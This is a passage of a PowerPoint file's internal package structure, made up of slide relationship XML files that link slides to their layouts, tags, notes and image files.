Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag729.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide191.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1741.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide192.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1751.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide193.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1761.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag738.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag737.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag736.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag735.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag734.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag733.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide194.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag747.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag746.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag745.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag744.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag743.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag742.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag741.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag740.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1771.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag751.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag750.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag749.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag748.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag739.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide195.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1782.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag754.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag753.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag752.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide196.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1792.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag757.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag756.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag755.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide197.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1801.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag761.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag760.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag759.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag758.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide198.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1811.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag766.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag765.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag764.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag763.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag762.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide199.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1821.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag770.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag769.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag768.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag767.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31.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide200.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1831.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag774.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag773.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag772.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag771.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide201.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1841.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag778.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag777.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag776.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag775.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide202.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1851.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag782.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag781.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag780.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag779.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide203.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1861.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag786.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag785.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag784.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag783.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide204.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1871.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag790.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag789.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag788.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag787.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide205.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1881.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag794.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag793.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag792.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag791.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide206.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1891.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag798.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag797.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag796.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag795.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide207.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1901.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag802.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag801.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag800.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag799.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide208.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1911.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag806.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag805.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag804.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag803.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide209.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1921.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag807.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag67.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag66.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag64.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide210.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag811.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag810.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1931.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag809.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag808.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide211.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1941.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide212.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1951.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide213.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1961.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag817.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag816.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag815.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag814.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag813.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag812.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide214.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag826.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag825.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag824.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag823.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag822.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag821.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag820.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag819.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1971.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag830.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag829.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag828.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag827.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag818.xml"/></Relationships>
